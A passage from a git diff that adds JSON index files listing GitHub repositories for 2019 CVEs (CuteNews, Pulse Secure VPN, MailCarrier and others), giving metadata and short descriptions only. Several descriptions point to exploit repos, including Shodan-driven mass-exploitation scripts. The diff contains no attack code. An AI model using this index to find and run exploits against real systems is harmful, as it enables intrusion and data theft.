module missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC & DS will display warnings,and robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected the RC will auto detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (identifies the type of module that’s missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled. Note that teams might have to readjust their light threshold values in their op modes. On DS user interface, gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in About screen on RC and DS apps. Incorporated a display filter on pairing screen to filter out devices that don’t use the “-“ format. This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue on with a blank (“”) device name that would disrupt WiFi Direct Pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps Prevent Wifi from entering power saving mode removed unused import from driver station Corrrected \"Dead zone\" joystick code. LED.getDeviceName and .getConnectionInfo() return null apps check for ROBOCOL_VERSION mismatch Fix for Telemetry also has off-by-one errors in its data string sizing \/ short size limitations error User telemetry output is sorted. added formatting variants to DbgLog and RobotLog APIs code modified to allow for a long list of op mode names. changes to improve thread safety of RobocolDatagramSocket Fix for \"missing hardware leaves robot controller disconnected from driver station\" error fix for \"fast tapping of Init\/Start causes problems\" (toast is now only instantiated on UI thread). added some log statements for thread life cycle. moved gamepad reset logic inside of initActiveOpMode() for robustness changes made to mitigate risk of race conditions on public methods. changes to try and flag when WiFi Direct name contains non-printable characters. fix to correct race condition between .run() and .close() in ReadWriteRunnableStandard. updated FTDI driver made ReadWriteRunnableStanard interface public. fixed off-by-one errors in Command constructor moved specific hardware implmentations into their own package. moved specific gamepad implemnatations to the hardware library. changed LICENSE file to new BSD version. fixed race condition when shutting down Modern Robotics USB devices. methods in the ColorSensor classes have been synchronized. corrected isBusy() status to reflect end of motion. corrected \"back\" button keycode. the notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added Support for Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about Z axis) Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages More descriptive error messages for exceptions in user code. Updated DcMotor API Enable read mode on new address in setI2cAddress Fix so that driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix USB initializtion race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed bug so that USB device is closed if event loop teardown method was not called. Fixed timer UI issue Fixed duplicate name UI bug (Legacy Module configuration). Fixed race condition in EventLoopManager. Fix to keep references stable when updating gamepad. For legacy Matrix motor\/servo controllers removed necessity of appending \"Motor\" and \"Servo\" to controller names. Updated HT color sensor driver to use constants from ModernRoboticsUsbLegacyModule class. Updated MR color sensor driver to use constants from ModernRoboticsUsbDeviceInterfaceModule class. Correctly handle I2C Address change in all color sensors Updated\/cleaned up op modes. Updated comments in LinearI2cAddressChange.java example op mode. Replaced the calls to \"setChannelMode\" with \"setMode\" (to match the new of the DcMotor method). Removed K9AutoTime.java op mode. Added MRGyroTest.java op mode (demonstrates how to use MR Gyro Sensor). Added MRRGBExample.java op mode (demonstrates how to use MR Color Sensor). Added HTRGBExample.java op mode (demonstrates how to use HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for Legacy Matrix 9.6V motor\/servo controller. Cleaned up build.gradle file. Minor UI and bug fixes for driver station and robot controller apps. Throws error if Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an \"INIT\" button on driver station. The init() and loop() methods are now required (i.e., need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use the LinearOpMode mode to create a linear (not event driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The API for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.", + "fork": false, + "created_at": "2021-03-08T11:34:11Z", + "updated_at": "2024-11-26T11:48:51Z", + "pushed_at": "2024-04-12T05:48:35Z", + "stargazers_count": 170, + "watchers_count": 170, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 60, + "watchers": 170, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 495329150, + "name": "https-nj.gov---CVE-2019-11358", + "full_name": "Snorlyd\/https-nj.gov---CVE-2019-11358", + "owner": { + "login": "Snorlyd", + "id": 93614879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93614879?v=4", + "html_url": "https:\/\/github.com\/Snorlyd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Snorlyd\/https-nj.gov---CVE-2019-11358", + "description": "Vulnearability Report of the New Jersey official site", + "fork": false, + "created_at": "2022-05-23T08:51:42Z", + "updated_at": "2024-10-05T19:49:08Z", + "pushed_at": "2022-05-23T09:07:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 675030174, + "name": "CVE-2019-11358", + "full_name": "isacaya\/CVE-2019-11358", + "owner": { + "login": "isacaya", + "id": 114328108, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114328108?v=4", + "html_url": "https:\/\/github.com\/isacaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/isacaya\/CVE-2019-11358", + "description": null, + "fork": false, + "created_at": "2023-08-05T14:44:42Z", + "updated_at": "2023-08-05T14:45:12Z", + "pushed_at": "2023-08-05T14:52:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11395.json b/2019/CVE-2019-11395.json new file mode 100644 index 0000000000..e3c0035903 --- /dev/null +++ b/2019/CVE-2019-11395.json @@ -0,0 +1,64 @@ +[ + { + "id": 735566210, + "name": "CVE-2019-11395", + "full_name": "RedAlien00\/CVE-2019-11395", + "owner": { + "login": "RedAlien00", + "id": 139674688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139674688?v=4", + "html_url": "https:\/\/github.com\/RedAlien00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedAlien00\/CVE-2019-11395", + "description": "MailCarrier 2.51 - POP3 'USER' Buffer Overflow", + "fork": false, + "created_at": "2023-12-25T11:30:37Z", + "updated_at": "2024-10-01T09:17:24Z", + "pushed_at": "2024-10-01T09:17:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789760137, + "name": "CVE-2019-11395", + "full_name": "caioprince\/CVE-2019-11395", + "owner": { + "login": "caioprince", + "id": 25197276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25197276?v=4", + "html_url": "https:\/\/github.com\/caioprince", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/caioprince\/CVE-2019-11395", + "description": "A exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.", + "fork": false, + "created_at": "2024-04-21T13:39:40Z", + "updated_at": "2024-04-21T14:17:44Z", + "pushed_at": "2024-04-21T14:14:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11408.json b/2019/CVE-2019-11408.json new file mode 100644 index 0000000000..a394bd68fa --- /dev/null +++ b/2019/CVE-2019-11408.json @@ -0,0 +1,33 @@ +[ + { + "id": 723437944, + "name": "fusionpbx_rce_vulnerability", + "full_name": "HoseynHeydari\/fusionpbx_rce_vulnerability", + "owner": { + "login": "HoseynHeydari", + "id": 15010073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15010073?v=4", + "html_url": "https:\/\/github.com\/HoseynHeydari", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoseynHeydari\/fusionpbx_rce_vulnerability", + "description": "Chain CVE-2019-11408 – XSS in operator panel and CVE-2019-11409 – Command injection in operator panel.", + "fork": false, + "created_at": "2023-11-25T17:04:39Z", + "updated_at": "2024-06-09T16:05:08Z", + "pushed_at": "2024-06-09T16:05:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11447.json b/2019/CVE-2019-11447.json new file mode 100644 index 0000000000..62cc919cdf --- /dev/null +++ b/2019/CVE-2019-11447.json @@ -0,0 +1,298 @@ +[ + { + "id": 305112358, + "name": "CVE-2019-11447", + "full_name": "mt-code\/CVE-2019-11447", + "owner": { + "login": "mt-code", + "id": 28394867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28394867?v=4", + "html_url": "https:\/\/github.com\/mt-code", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mt-code\/CVE-2019-11447", + "description": "Exploits CuteNews 2.1.2 via poor file upload checks used when uploading an avatar image leading to RCE.", + "fork": false, + "created_at": "2020-10-18T13:49:55Z", + "updated_at": "2020-10-20T10:33:42Z", + "pushed_at": "2020-10-20T10:33:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 308567472, + "name": "CVE-2019-11447-EXP", + "full_name": "khuntor\/CVE-2019-11447-EXP", + "owner": { + "login": "khuntor", + "id": 25006917, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25006917?v=4", + "html_url": "https:\/\/github.com\/khuntor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khuntor\/CVE-2019-11447-EXP", + "description": "CuteNews Avatar 2.1.2 Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2020-10-30T08:21:46Z", + "updated_at": "2020-10-30T09:11:06Z", + "pushed_at": "2020-10-30T09:03:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 344394215, + "name": "CVE-2019-11447-POC", + "full_name": "dinesh876\/CVE-2019-11447-POC", + "owner": { + "login": "dinesh876", + "id": 32631002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32631002?v=4", + "html_url": "https:\/\/github.com\/dinesh876", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinesh876\/CVE-2019-11447-POC", + "description": "CuteNews 2.1.2 - CVE-2019-11447 Proof-Of-Concept", + "fork": false, + "created_at": "2021-03-04T07:56:43Z", + "updated_at": "2022-06-09T14:29:16Z", + "pushed_at": "2021-01-15T02:51:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 348695028, + "name": "CVE-2019-11447_CuteNews-AvatarUploadRCE", + "full_name": "ColdFusionX\/CVE-2019-11447_CuteNews-AvatarUploadRCE", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2019-11447_CuteNews-AvatarUploadRCE", + "description": "Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)", + "fork": false, + "created_at": "2021-03-17T12:07:12Z", + "updated_at": "2024-08-12T20:11:17Z", + "pushed_at": "2021-03-17T13:46:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "avatar", + "avatar-upload-rce", + "bypass", + "cutenews", + "php", + "php-reverse", + "rce", + "register", + "remote-code-execution" + ], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 349011894, + "name": "cve-2019-11447", + "full_name": "thewhiteh4t\/cve-2019-11447", + "owner": { + "login": "thewhiteh4t", + "id": 36354846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36354846?v=4", + "html_url": "https:\/\/github.com\/thewhiteh4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thewhiteh4t\/cve-2019-11447", + "description": "CutePHP Cute News 2.1.2 RCE PoC", + "fork": false, + "created_at": "2021-03-18T09:24:29Z", + "updated_at": "2024-10-01T08:41:38Z", + "pushed_at": "2021-03-18T09:45:04Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cutenews", + "cutephp", + "cve-2019-11447", + "exploit", + "python", + "rce" + ], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 481430471, + "name": "CVE-2019-11447", + "full_name": "0xConstant\/CVE-2019-11447", + "owner": { + "login": "0xConstant", + "id": 51972282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xConstant\/CVE-2019-11447", + "description": null, + "fork": false, + "created_at": "2022-04-14T01:45:04Z", + "updated_at": "2022-04-14T01:56:44Z", + "pushed_at": "2022-04-14T02:52:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736750785, + "name": "CVE-2019-11447_reverse_shell_upload", + "full_name": "substing\/CVE-2019-11447_reverse_shell_upload", + "owner": { + "login": "substing", + "id": 76443980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76443980?v=4", + "html_url": "https:\/\/github.com\/substing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/substing\/CVE-2019-11447_reverse_shell_upload", + "description": null, + "fork": false, + "created_at": "2023-12-28T19:11:09Z", + "updated_at": "2023-12-28T19:33:04Z", + "pushed_at": "2023-12-28T19:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 756064009, + "name": "CVE-2019-11447-POC", + "full_name": "CRFSlick\/CVE-2019-11447-POC", + "owner": { + "login": "CRFSlick", + "id": 159729678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159729678?v=4", + "html_url": "https:\/\/github.com\/CRFSlick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CRFSlick\/CVE-2019-11447-POC", + "description": "CuteNews 2.1.2 - CVE-2019-11447 Proof-Of-Concept", + "fork": false, + "created_at": "2024-02-11T21:36:58Z", + "updated_at": "2024-08-08T03:07:05Z", + "pushed_at": "2024-02-11T21:39:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845992322, + "name": "CVE-2019-11447.c", + "full_name": "ojo5\/CVE-2019-11447.c", + "owner": { + "login": "ojo5", + "id": 109613345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109613345?v=4", + "html_url": "https:\/\/github.com\/ojo5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ojo5\/CVE-2019-11447.c", + "description": "CVE-2019-11447 written in C", + "fork": false, + "created_at": "2024-08-22T10:27:55Z", + "updated_at": "2024-08-24T11:37:23Z", + "pushed_at": "2024-08-24T11:37:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11477.json b/2019/CVE-2019-11477.json new file mode 100644 index 0000000000..bad4282b94 --- /dev/null +++ b/2019/CVE-2019-11477.json @@ -0,0 +1,33 @@ +[ + { + "id": 198296662, + "name": "cve-2019-11477-poc", + "full_name": "sasqwatch\/cve-2019-11477-poc", + "owner": { + "login": "sasqwatch", + "id": 22352904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22352904?v=4", + "html_url": "https:\/\/github.com\/sasqwatch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sasqwatch\/cve-2019-11477-poc", + "description": null, + "fork": false, + "created_at": "2019-07-22T20:23:08Z", + "updated_at": "2024-08-12T19:51:18Z", + "pushed_at": "2019-07-21T15:56:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11510.json b/2019/CVE-2019-11510.json new file mode 100644 index 0000000000..e983ef5ae2 --- /dev/null +++ b/2019/CVE-2019-11510.json @@ -0,0 +1,421 @@ +[ + { + "id": 203542766, + "name": "CVE-2019-11510", + "full_name": "projectzeroindia\/CVE-2019-11510", + "owner": { + "login": "projectzeroindia", + "id": 54312442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54312442?v=4", + "html_url": "https:\/\/github.com\/projectzeroindia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/projectzeroindia\/CVE-2019-11510", + "description": "Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)", + "fork": false, + "created_at": "2019-08-21T08:40:26Z", + "updated_at": "2024-09-11T02:56:59Z", + "pushed_at": "2020-01-11T13:55:33Z", + "stargazers_count": 361, + "watchers_count": 361, + "has_discussions": false, + "forks_count": 135, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 135, + "watchers": 361, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 203575464, + "name": "Pulse", + "full_name": "nuc13us\/Pulse", + "owner": { + "login": "nuc13us", + "id": 22916937, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22916937?v=4", + "html_url": "https:\/\/github.com\/nuc13us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nuc13us\/Pulse", + "description": "Pulse Secure VPN CVE-2019-11510", + "fork": false, + "created_at": "2019-08-21T12:03:14Z", + "updated_at": "2020-10-19T12:40:24Z", + "pushed_at": "2019-08-21T12:03:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 203747377, + "name": "CVE-2019-11510-poc", + "full_name": "imjdl\/CVE-2019-11510-poc", + "owner": { + "login": "imjdl", + "id": 31382943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31382943?v=4", + "html_url": "https:\/\/github.com\/imjdl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imjdl\/CVE-2019-11510-poc", + "description": "Pulse Secure SSL VPN pre-auth file reading", + "fork": false, + "created_at": "2019-08-22T08:18:19Z", + "updated_at": "2024-08-12T19:52:14Z", + "pushed_at": "2019-08-26T19:33:43Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 50, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 204579243, + "name": "CVE-2019-11510_poc", + "full_name": "es0\/CVE-2019-11510_poc", + "owner": { + "login": "es0", + "id": 10739380, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10739380?v=4", + "html_url": "https:\/\/github.com\/es0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/es0\/CVE-2019-11510_poc", + "description": "PoC for CVE-2019-11510 | Pulse Secure 8.1R15.1\/8.2\/8.3\/9.0 SSL VPN - Arbitrary File Disclosure vulnerability", + "fork": false, + "created_at": "2019-08-26T23:30:15Z", + "updated_at": "2024-08-12T19:52:23Z", + "pushed_at": "2019-08-27T00:52:49Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 204608508, + "name": "http-pulse_ssl_vpn.nse", + "full_name": "r00tpgp\/http-pulse_ssl_vpn.nse", + "owner": { + "login": "r00tpgp", + "id": 29351179, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29351179?v=4", + "html_url": "https:\/\/github.com\/r00tpgp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00tpgp\/http-pulse_ssl_vpn.nse", + "description": "Nmap NSE script to detect Pulse Secure SSL VPN file disclosure CVE-2019-11510", + "fork": false, + "created_at": "2019-08-27T03:04:19Z", + "updated_at": "2024-08-12T19:52:23Z", + "pushed_at": "2019-08-27T07:03:26Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 204666616, + "name": "CVE-2019-11510-1", + "full_name": "jas502n\/CVE-2019-11510-1", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-11510-1", + "description": "SSL VPN Rce", + "fork": false, + "created_at": "2019-08-27T09:21:10Z", + "updated_at": "2024-09-11T15:28:24Z", + "pushed_at": "2019-08-27T09:29:05Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 53, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 205106127, + "name": "CVE-2019-11510", + "full_name": "jason3e7\/CVE-2019-11510", + "owner": { + "login": "jason3e7", + "id": 3059297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3059297?v=4", + "html_url": "https:\/\/github.com\/jason3e7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jason3e7\/CVE-2019-11510", + "description": null, + "fork": false, + "created_at": "2019-08-29T07:27:57Z", + "updated_at": "2019-08-29T07:28:54Z", + "pushed_at": "2019-08-29T07:28:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 207348255, + "name": "pwn-pulse", + "full_name": "BishopFox\/pwn-pulse", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/pwn-pulse", + "description": "Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)", + "fork": false, + "created_at": "2019-09-09T15:58:39Z", + "updated_at": "2024-10-03T05:14:13Z", + "pushed_at": "2020-01-15T17:01:50Z", + "stargazers_count": 137, + "watchers_count": 137, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "infosec", + "penetration-testing", + "pentest-scripts", + "pentesting", + "red-team", + "security-tools" + ], + "visibility": "public", + "forks": 60, + "watchers": 137, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 226548291, + "name": "pulsexploit", + "full_name": "aqhmal\/pulsexploit", + "owner": { + "login": "aqhmal", + "id": 22043590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22043590?v=4", + "html_url": "https:\/\/github.com\/aqhmal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aqhmal\/pulsexploit", + "description": "Automated script for Pulse Secure SSL VPN exploit (CVE-2019-11510) using hosts retrieved from Shodan API. You must have a Shodan account to use this script.", + "fork": false, + "created_at": "2019-12-07T17:09:24Z", + "updated_at": "2024-08-12T19:55:32Z", + "pushed_at": "2020-04-25T05:06:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "information-extraction", + "infosec", + "offset", + "pentest-script", + "python3" + ], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 256271162, + "name": "check-your-pulse", + "full_name": "cisagov\/check-your-pulse", + "owner": { + "login": "cisagov", + "id": 18539691, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18539691?v=4", + "html_url": "https:\/\/github.com\/cisagov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cisagov\/check-your-pulse", + "description": "This utility can help determine if indicators of compromise (IOCs) exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510.", + "fork": false, + "created_at": "2020-04-16T16:32:47Z", + "updated_at": "2024-08-12T20:00:16Z", + "pushed_at": "2020-08-19T22:44:06Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 282932489, + "name": "pulse-exploit", + "full_name": "andripwn\/pulse-exploit", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/pulse-exploit", + "description": "Pulse Secure SSL VPN exploit (CVE-2019-11510) using hosts retrieved from Shodan API.", + "fork": false, + "created_at": "2020-07-27T15:06:08Z", + "updated_at": "2020-12-13T12:56:51Z", + "pushed_at": "2020-07-27T15:07:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 296402155, + "name": "CVE-2019-11510-PulseVPN", + "full_name": "pwn3z\/CVE-2019-11510-PulseVPN", + "owner": { + "login": "pwn3z", + "id": 71440287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71440287?v=4", + "html_url": "https:\/\/github.com\/pwn3z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwn3z\/CVE-2019-11510-PulseVPN", + "description": null, + "fork": false, + "created_at": "2020-09-17T17:53:56Z", + "updated_at": "2020-11-05T21:41:20Z", + "pushed_at": "2020-11-05T21:41:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, 